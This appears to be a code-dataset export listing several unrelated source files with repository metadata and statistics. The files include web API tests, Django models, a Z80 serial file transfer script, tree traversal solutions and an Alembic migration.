| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d67522406aa24a1076bba2d473fe236567784e7b
| 5,524
|
py
|
Python
|
tests/layer/test_routes.py
|
EasyVizAR/edge-server
|
523d64da5a9579d7c99bede47985a7a09d33f9ec
|
[
"MIT"
] | null | null | null |
tests/layer/test_routes.py
|
EasyVizAR/edge-server
|
523d64da5a9579d7c99bede47985a7a09d33f9ec
|
[
"MIT"
] | null | null | null |
tests/layer/test_routes.py
|
EasyVizAR/edge-server
|
523d64da5a9579d7c99bede47985a7a09d33f9ec
|
[
"MIT"
] | 1
|
2021-09-17T16:13:16.000Z
|
2021-09-17T16:13:16.000Z
|
import os
from http import HTTPStatus
import pytest
from server.main import app
@pytest.mark.asyncio
async def test_layer_routes():
"""
Test layer routes
"""
# Name of a field within the resource which we can change and test.
test_field = "name"
async with app.test_client() as client:
# Create a test location
response = await client.post("/locations", json=dict(name="Test"))
assert response.status_code == HTTPStatus.CREATED
assert response.is_json
location = await response.get_json()
layers_url = "/locations/{}/layers".format(location['id'])
# Initial list of layers
response = await client.get(layers_url)
assert response.status_code == HTTPStatus.OK
assert response.is_json
layers = await response.get_json()
assert isinstance(layers, list)
# Initial list of layers with envelope
response = await client.get(layers_url + "?envelope=items")
assert response.status_code == HTTPStatus.OK
assert response.is_json
layers2 = await response.get_json()
assert isinstance(layers2, dict)
assert isinstance(layers2['items'], list)
# Create an object
response = await client.post(layers_url, json={test_field: "foo"})
assert response.status_code == HTTPStatus.CREATED
assert response.is_json
layer = await response.get_json()
assert isinstance(layer, dict)
assert layer['id'] is not None
assert layer[test_field] == "foo"
layer_url = "{}/{}".format(layers_url, layer['id'])
# Test getting the object back
response = await client.get(layer_url)
assert response.status_code == HTTPStatus.OK
assert response.is_json
layer2 = await response.get_json()
assert layer2['id'] == layer['id']
assert layer2[test_field] == layer[test_field]
# Test changing the name
response = await client.patch(layer_url, json={"id": "bad", test_field: "bar"})
assert response.status_code == HTTPStatus.OK
assert response.is_json
layer2 = await response.get_json()
assert layer2['id'] == layer['id']
assert layer2[test_field] == "bar"
# Test replacement
response = await client.put(layer_url, json=layer)
assert response.status_code == HTTPStatus.OK
assert response.is_json
layer2 = await response.get_json()
assert layer2['id'] == layer['id']
assert layer2[test_field] == layer[test_field]
# Test deleting the object
response = await client.delete(layer_url)
assert response.status_code == HTTPStatus.OK
assert response.is_json
layer2 = await response.get_json()
assert layer2['id'] == layer['id']
# Test creating object through PUT
response = await client.put(layer_url, json=layer)
assert response.status_code == HTTPStatus.CREATED
assert response.is_json
layer2 = await response.get_json()
assert layer2['id'] == layer['id']
assert layer2[test_field] == layer[test_field]
# Test that object does not exist after DELETE
response = await client.delete(layer_url)
assert response.status_code == HTTPStatus.OK
response = await client.delete(layer_url)
assert response.status_code == HTTPStatus.NOT_FOUND
response = await client.get(layer_url)
assert response.status_code == HTTPStatus.NOT_FOUND
response = await client.patch(layer_url, json={test_field: "bar"})
assert response.status_code == HTTPStatus.NOT_FOUND
@pytest.mark.asyncio
async def test_layer_upload():
"""
Test layer upload
"""
async with app.test_client() as client:
# Create a test location
response = await client.post("/locations", json=dict(name="Test"))
assert response.status_code == HTTPStatus.CREATED
assert response.is_json
location = await response.get_json()
layers_url = "/locations/{}/layers".format(location['id'])
# Create an object
response = await client.post(layers_url, json={"type": "uploaded"})
assert response.status_code == HTTPStatus.CREATED
assert response.is_json
layer = await response.get_json()
assert isinstance(layer, dict)
assert layer['id'] is not None
assert layer['type'] == "uploaded"
assert layer['ready'] is False
layer_url = "{}/{}".format(layers_url, layer['id'])
# Test upload process
print(layer['imageUrl'])
response = await client.put(layer['imageUrl'], data="test")
assert response.status_code == HTTPStatus.CREATED
assert response.is_json
layer2 = await response.get_json()
assert isinstance(layer, dict)
assert layer2['id'] == layer['id']
assert layer2['ready'] is True
assert layer2['updated'] > layer['updated']
# Test downloading the file
response = await client.get(layer['imageUrl'])
assert response.status_code == HTTPStatus.OK
data = await response.get_data()
assert data == "test".encode('utf-8')
# Test deleting the object
response = await client.delete(layer_url)
assert response.status_code == HTTPStatus.OK
assert response.is_json
layer2 = await response.get_json()
assert layer2['id'] == layer['id']
| 36.342105
| 87
| 0.63903
| 659
| 5,524
| 5.2261
| 0.144158
| 0.126016
| 0.099303
| 0.125436
| 0.809524
| 0.793844
| 0.745354
| 0.700058
| 0.663473
| 0.656214
| 0
| 0.005845
| 0.256698
| 5,524
| 151
| 88
| 36.582781
| 0.832927
| 0.081101
| 0
| 0.721154
| 0
| 0
| 0.049469
| 0
| 0
| 0
| 0
| 0
| 0.538462
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.038462
| 0.009615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d6a32a88ac5f328e1d86fc50fe8044d1e5fbd88a
| 1,405
|
py
|
Python
|
chatbot/models.py
|
jazzyeagle/chatbot_website
|
47da27f85907b5f3f7ea94bffd343a6322b8f39a
|
[
"BSD-3-Clause"
] | null | null | null |
chatbot/models.py
|
jazzyeagle/chatbot_website
|
47da27f85907b5f3f7ea94bffd343a6322b8f39a
|
[
"BSD-3-Clause"
] | null | null | null |
chatbot/models.py
|
jazzyeagle/chatbot_website
|
47da27f85907b5f3f7ea94bffd343a6322b8f39a
|
[
"BSD-3-Clause"
] | 1
|
2022-03-05T15:08:45.000Z
|
2022-03-05T15:08:45.000Z
|
from django.db import models
from mainsite.models import User
class Command(models.Model):
class Meta:
app_label = 'chatbot'
name = models.TextField(unique=True)
script = models.TextField()
created_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, related_name='original_commands')
updated_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, related_name='updated_commands')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Variable(models.Model):
class Meta:
app_label = 'chatbot'
name = models.TextField()
value = models.TextField()
created_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, related_name='original_variables')
updated_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, related_name='updated_variables')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class ConnectionSetting(models.Model):
class meta:
app_label = 'chatbot'
platform = models.TextField()
field = models.TextField()
value = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
| 36.025641
| 125
| 0.718149
| 173
| 1,405
| 5.635838
| 0.242775
| 0.107692
| 0.129231
| 0.153846
| 0.828718
| 0.828718
| 0.787692
| 0.751795
| 0.751795
| 0.751795
| 0
| 0
| 0.178648
| 1,405
| 38
| 126
| 36.973684
| 0.844887
| 0
| 0
| 0.464286
| 0
| 0
| 0.063345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.892857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d6b05c41072991ea28eea1c8953eb11e86727aec
| 193
|
py
|
Python
|
pyresp/tuplespace/bucket_concurrent_query.py
|
zachasme/pyresp
|
a363cef3435769ba86b86ac1d31576566ca3ddc9
|
[
"MIT"
] | 3
|
2017-10-15T11:55:01.000Z
|
2018-11-04T19:29:34.000Z
|
pyresp/tuplespace/bucket_concurrent_query.py
|
zachasme/pyresp
|
a363cef3435769ba86b86ac1d31576566ca3ddc9
|
[
"MIT"
] | null | null | null |
pyresp/tuplespace/bucket_concurrent_query.py
|
zachasme/pyresp
|
a363cef3435769ba86b86ac1d31576566ca3ddc9
|
[
"MIT"
] | null | null | null |
from threading import Thread, Condition
from . import TupleSpaceBucket, TupleSpaceConcurrentQuery
class TupleSpaceBucketConcurrentQuery(TupleSpaceBucket, TupleSpaceConcurrentQuery):
pass
| 27.571429
| 83
| 0.860104
| 14
| 193
| 11.857143
| 0.714286
| 0.493976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103627
| 193
| 6
| 84
| 32.166667
| 0.959538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
d6cc3e27181b18c31794d88f4b3c951d26cbddfb
| 1,893
|
py
|
Python
|
Conjoint Analysis/data.py
|
victor7246/Academic-Projects
|
dd877fd68ea29e78bfcfe33978eac3f5c5813029
|
[
"MIT"
] | null | null | null |
Conjoint Analysis/data.py
|
victor7246/Academic-Projects
|
dd877fd68ea29e78bfcfe33978eac3f5c5813029
|
[
"MIT"
] | null | null | null |
Conjoint Analysis/data.py
|
victor7246/Academic-Projects
|
dd877fd68ea29e78bfcfe33978eac3f5c5813029
|
[
"MIT"
] | null | null | null |
import pandas
import numpy
data = pandas.read_csv("data/data.csv")
l = []
for i in range(len(data)):
if data.iloc[i][0] is not numpy.nan:
''' l.append((i+1,data.iloc[i][0],data.iloc[i][1],apple,samsung,sony,cl,cm,ch,pl,pm,ph,sl,sm,sh,ml,mm,mh,pl,pm,ph,pvh,data.iloc[i][2])) '''
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,1,0,data.iloc[i][2]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,1,0,0,0,1,0,0,1,0,1,0,0,0,0,0,1,data.iloc[i][3]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,1,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,0,0,data.iloc[i][4]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,1,0,0,0,1,0,0,1,0,1,0,0,1,0,0,1,0,0,data.iloc[i][5]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,1,0,0,1,0,0,0,1,0,0,1,0,1,0,0,0,data.iloc[i][6]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,1,data.iloc[i][7]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,0,1,0,0,data.iloc[i][8]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,data.iloc[i][9]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,1,data.iloc[i][10]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,1,data.iloc[i][11]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,1,0,0,0,0,1,0,0,1,1,0,0,1,0,0,0,data.iloc[i][12]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,1,0,0,1,0,0,0,1,0,0,1,0,1,0,0,0,data.iloc[i][13]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,1,data.iloc[i][14]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,0,1,0,0,1,0,0,1,0,1,0,0,1,0,0,0,data.iloc[i][15]))
l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,1,0,0,data.iloc[i][16]))
pandas.DataFrame(l).to_csv("data/main.csv")
| 75.72
| 141
| 0.577919
| 595
| 1,893
| 1.835294
| 0.090756
| 0.194139
| 0.18956
| 0.190476
| 0.819597
| 0.819597
| 0.819597
| 0.803114
| 0.79304
| 0.792125
| 0
| 0.196046
| 0.038035
| 1,893
| 24
| 142
| 78.875
| 0.403624
| 0
| 0
| 0
| 0
| 0
| 0.014823
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ba3a68ad06555077d9ad0b79684141cb60a1b38f
| 1,539
|
py
|
Python
|
cpm_xfer.py
|
roberts7531/z80Computer
|
28623b04db6c936bc43dd01dde4b736ec99cae67
|
[
"CC0-1.0"
] | null | null | null |
cpm_xfer.py
|
roberts7531/z80Computer
|
28623b04db6c936bc43dd01dde4b736ec99cae67
|
[
"CC0-1.0"
] | null | null | null |
cpm_xfer.py
|
roberts7531/z80Computer
|
28623b04db6c936bc43dd01dde4b736ec99cae67
|
[
"CC0-1.0"
] | null | null | null |
import serial
from intelhex import IntelHex
from time import sleep
ser = serial.Serial('/dev/cu.usbserial-110', 115200)
sleep(3)
f=open("CPM211FilesPkg.txt","r")
text = f.read()
data ="A:DOWNLOAD DUMP.COM\r\nU0\r\n:21000039221502315702CDC101FEFFC21B0111F301CD9C01C351013E80321302210000E5CDA201E1DA5101477DE60FC24401CD7201CD59010FDA51017CCD8F017DCD8F01233E20CD650178CD8F01C32301CD72012A1502F9C9E5D5C50E0BCD0500C1D1E1C9E5D5C50E025FCD0500C1D1E1C93E0DCD65013E0ACD6501C9E60FFE0AD28901C630C38B01C637CD6501C9F50F0F0F0FCD7D01F1CD7D01C90E09CD0500C93A1302FE80C2B301CDCE01B7CAB30137C95F16003C321302218000197EB7C9AF327C00115C000E0FCD0500C9E5D5C5115C000E14CD0500C1D1E1C946494C452044554D502056455253494F4E20312E34240D0A4E4F20494E5055542046494C452050524553454E54204F4E204449534B24EA21F5C5D5E5590E02CD0610E1D1C1F1C9FE20C8FE09C8FE2CC8FE0DC8FE7FCA3C05C90E0DCD15000E0ACD1500C9CD0907FE0DCA2A05CD2400CA41000E04218B063620230DC254000E05218B0677CD0907CD2400CA7200230DCA2A05C360003A8B06FE20C9D630FE0AD8C6F9FE10D8C32A05CD4100CA2A05110000010000218B06097EFE20CAB000CD78006B62292929295F160019EB0379FE04C29100424B7B0504C9CD8500C22A05C921050036C336C3210000220600C9171717E638C917171717E630C9EB2A8B06EB7BBEC2E700237ABEC82B2B2B0DC2DD000DC90604D5118B061ABEC20201231305C2F500>001A"
ser.write(("\r\n").encode("ascii"))
ser.write(("\r\n").encode("ascii"))
ser.write(("\r\n").encode("ascii"))
print(ser.readline().decode("ascii"))
j=0
for i in text:
ser.write((i).encode("ascii"))
sleep(0.005)
if(j%10==0):
print(str(int(j/len(text)*100)) + "%")
j+=1
| 66.913043
| 1,067
| 0.875893
| 89
| 1,539
| 15.146067
| 0.539326
| 0.005935
| 0.02003
| 0.022255
| 0.046736
| 0.046736
| 0.046736
| 0.046736
| 0.046736
| 0.046736
| 0
| 0.493216
| 0.042235
| 1,539
| 22
| 1,068
| 69.954545
| 0.421303
| 0
| 0
| 0.157895
| 0
| 0
| 0.739753
| 0.695511
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.157895
| 0
| 0.157895
| 0.105263
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba493451f45eebc8b73994653b5df394e2852605
| 1,301
|
py
|
Python
|
leetcode.com/python/94_Binary_Tree_Inorder_Traversal.py
|
XSoyOscar/Algorithms
|
6e1626d4b0f7804494f0a651698966ad6fd0fe18
|
[
"MIT"
] | 713
|
2019-11-19T16:11:25.000Z
|
2022-03-31T02:27:52.000Z
|
leetcode.com/python/94_Binary_Tree_Inorder_Traversal.py
|
arunsank/coding-interview-gym
|
8131e3a82795707e144fe55d765b6c15bdb97306
|
[
"MIT"
] | 7
|
2020-01-16T17:07:18.000Z
|
2021-11-15T18:24:39.000Z
|
leetcode.com/python/94_Binary_Tree_Inorder_Traversal.py
|
arunsank/coding-interview-gym
|
8131e3a82795707e144fe55d765b6c15bdb97306
|
[
"MIT"
] | 393
|
2019-11-18T17:55:45.000Z
|
2022-03-28T20:26:32.000Z
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Solution 1
class Solution(object):
def inorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
stack, result = [], []
currentNode = root
while currentNode is not None or len(stack) > 0:
while currentNode is not None:
stack.append(currentNode)
currentNode = currentNode.left
currentNode = stack.pop()
result.append(currentNode.val)
currentNode = currentNode.right
return result
# Solution 2
class Solution(object):
def inorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
stack, result = [], []
currentNode = root
while currentNode is not None or len(stack) > 0:
if currentNode is not None:
stack.append(currentNode)
currentNode = currentNode.left
else:
currentNode = stack.pop()
result.append(currentNode.val)
currentNode = currentNode.right
return result
| 26.02
| 56
| 0.538816
| 125
| 1,301
| 5.576
| 0.32
| 0.189383
| 0.091822
| 0.114778
| 0.833572
| 0.826399
| 0.826399
| 0.826399
| 0.826399
| 0.826399
| 0
| 0.00489
| 0.371253
| 1,301
| 49
| 57
| 26.55102
| 0.847188
| 0.198309
| 0
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0
| 0
| 0.24
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba4f15d22ecf454fb9f062f74edea5096623107e
| 229
|
py
|
Python
|
greenbot/bothelper.py
|
EMorf/greenbot
|
5528fcb9246109d6742a867b9668a408d43701d6
|
[
"MIT"
] | null | null | null |
greenbot/bothelper.py
|
EMorf/greenbot
|
5528fcb9246109d6742a867b9668a408d43701d6
|
[
"MIT"
] | null | null | null |
greenbot/bothelper.py
|
EMorf/greenbot
|
5528fcb9246109d6742a867b9668a408d43701d6
|
[
"MIT"
] | null | null | null |
import collections
class BotHelper:
bot_name = "Unknown"
@staticmethod
def get_bot_name():
return BotHelper.bot_name
@staticmethod
def set_bot_name(bot_name):
BotHelper.bot_name = bot_name
| 16.357143
| 37
| 0.681223
| 28
| 229
| 5.25
| 0.428571
| 0.333333
| 0.326531
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.253275
| 229
| 13
| 38
| 17.615385
| 0.859649
| 0
| 0
| 0.222222
| 0
| 0
| 0.030568
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0.111111
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
2417016372176b54fb5feaf7aa186f625e14dbe5
| 6,206
|
py
|
Python
|
yiyou/migrations/versions/af0f8de842ab_.py
|
aierweisi/yiyou
|
33a3879f45ce9a82f6dac6bd4e8e1ab345ac3be6
|
[
"MIT"
] | 1
|
2019-11-28T11:01:08.000Z
|
2019-11-28T11:01:08.000Z
|
yiyou/migrations/versions/af0f8de842ab_.py
|
aierweisi/yiyou
|
33a3879f45ce9a82f6dac6bd4e8e1ab345ac3be6
|
[
"MIT"
] | null | null | null |
yiyou/migrations/versions/af0f8de842ab_.py
|
aierweisi/yiyou
|
33a3879f45ce9a82f6dac6bd4e8e1ab345ac3be6
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: af0f8de842ab
Revises:
Create Date: 2017-12-30 22:35:30.487327
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'af0f8de842ab'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('country',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=20), nullable=False),
sa.Column('password_hash', sa.String(length=128), nullable=False),
sa.Column('mail', sa.String(length=64), nullable=False),
sa.Column('icon', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('username')
)
op.create_table('city',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=False),
sa.Column('country', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['country'], ['country.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('foods',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=False),
sa.Column('city', sa.Integer(), nullable=True),
sa.Column('describe', sa.Text(), nullable=True),
sa.Column('adress', sa.String(length=100), nullable=False),
sa.Column('score', sa.Integer(), nullable=False),
sa.Column('pictures', sa.Text(), nullable=False),
sa.Column('price', sa.Integer(), nullable=False),
sa.Column('type', sa.String(length=20), nullable=True),
sa.ForeignKeyConstraint(['city'], ['city.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('hotels',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=False),
sa.Column('city', sa.Integer(), nullable=True),
sa.Column('describe', sa.Text(), nullable=True),
sa.Column('adress', sa.String(length=100), nullable=False),
sa.Column('score', sa.Integer(), nullable=False),
sa.Column('pictures', sa.Integer(), nullable=False),
sa.Column('price', sa.Integer(), nullable=False),
sa.Column('type', sa.String(length=20), nullable=True),
sa.Column('rank', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['city'], ['city.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('shops',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=False),
sa.Column('city', sa.Integer(), nullable=True),
sa.Column('describe', sa.Text(), nullable=True),
sa.Column('adress', sa.String(length=100), nullable=False),
sa.Column('score', sa.Integer(), nullable=False),
sa.Column('pictures', sa.Text(), nullable=False),
sa.Column('price', sa.Integer(), nullable=False),
sa.Column('type', sa.String(length=20), nullable=True),
sa.ForeignKeyConstraint(['city'], ['city.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('spots',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=False),
sa.Column('city', sa.Integer(), nullable=True),
sa.Column('describe', sa.Text(), nullable=True),
sa.Column('adress', sa.String(length=100), nullable=False),
sa.Column('score', sa.Integer(), nullable=False),
sa.Column('pictures', sa.Text(), nullable=False),
sa.Column('price', sa.Integer(), nullable=False),
sa.Column('type', sa.String(length=20), nullable=True),
sa.Column('rank', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['city'], ['city.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('food_comments',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('food', sa.Integer(), nullable=True),
sa.Column('user', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['food'], ['foods.id'], ),
sa.ForeignKeyConstraint(['user'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('hotel_comments',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('hotel', sa.Integer(), nullable=True),
sa.Column('user', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['hotel'], ['hotels.id'], ),
sa.ForeignKeyConstraint(['user'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('shop_comments',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('shop', sa.Integer(), nullable=True),
sa.Column('user', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['shop'], ['shops.id'], ),
sa.ForeignKeyConstraint(['user'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('spot_comments',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('spot', sa.Integer(), nullable=True),
sa.Column('user', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['spot'], ['spots.id'], ),
sa.ForeignKeyConstraint(['user'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('spot_comments')
op.drop_table('shop_comments')
op.drop_table('hotel_comments')
op.drop_table('food_comments')
op.drop_table('spots')
op.drop_table('shops')
op.drop_table('hotels')
op.drop_table('foods')
op.drop_table('city')
op.drop_table('users')
op.drop_table('country')
# ### end Alembic commands ###
| 40.298701
| 70
| 0.649533
| 780
| 6,206
| 5.119231
| 0.110256
| 0.136238
| 0.150263
| 0.205109
| 0.813423
| 0.774856
| 0.762334
| 0.752567
| 0.730528
| 0.705735
| 0
| 0.013374
| 0.144538
| 6,206
| 153
| 71
| 40.562092
| 0.738746
| 0.045601
| 0
| 0.57037
| 0
| 0
| 0.125722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014815
| false
| 0.007407
| 0.014815
| 0
| 0.02963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
242fe77c00f5bf1e6b6426aa53fb0476e663b194
| 36
|
py
|
Python
|
myname.py
|
salazarvic2-MAS/python-docs-hello-world
|
7c0436ffe2fa6294419fba2cfd8b644c31f6ef6a
|
[
"MIT"
] | null | null | null |
myname.py
|
salazarvic2-MAS/python-docs-hello-world
|
7c0436ffe2fa6294419fba2cfd8b644c31f6ef6a
|
[
"MIT"
] | null | null | null |
myname.py
|
salazarvic2-MAS/python-docs-hello-world
|
7c0436ffe2fa6294419fba2cfd8b644c31f6ef6a
|
[
"MIT"
] | null | null | null |
def get_name():
return "Victor"
| 12
| 19
| 0.638889
| 5
| 36
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 36
| 2
| 20
| 18
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
79f6daa150201071b3816249b61e6cdb8ca231cb
| 62,401
|
py
|
Python
|
services/core/ActuatorAgent/tests/test_actuator_rpc.py
|
Entek-Technical-Services/BEMOSS3.5
|
581a205b4129530474a5ceee93cb36ef62992d4c
|
[
"BSD-3-Clause"
] | 73
|
2017-07-11T21:46:41.000Z
|
2022-03-11T03:35:25.000Z
|
services/core/ActuatorAgent/tests/test_actuator_rpc.py
|
Entek-Technical-Services/BEMOSS3.5
|
581a205b4129530474a5ceee93cb36ef62992d4c
|
[
"BSD-3-Clause"
] | 19
|
2017-10-10T22:06:15.000Z
|
2022-03-28T21:03:33.000Z
|
services/core/ActuatorAgent/tests/test_actuator_rpc.py
|
Entek-Technical-Services/BEMOSS3.5
|
581a205b4129530474a5ceee93cb36ef62992d4c
|
[
"BSD-3-Clause"
] | 36
|
2017-06-24T00:17:03.000Z
|
2022-03-31T13:58:36.000Z
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2015, Battelle Memorial Institute
# All rights reserved.
#
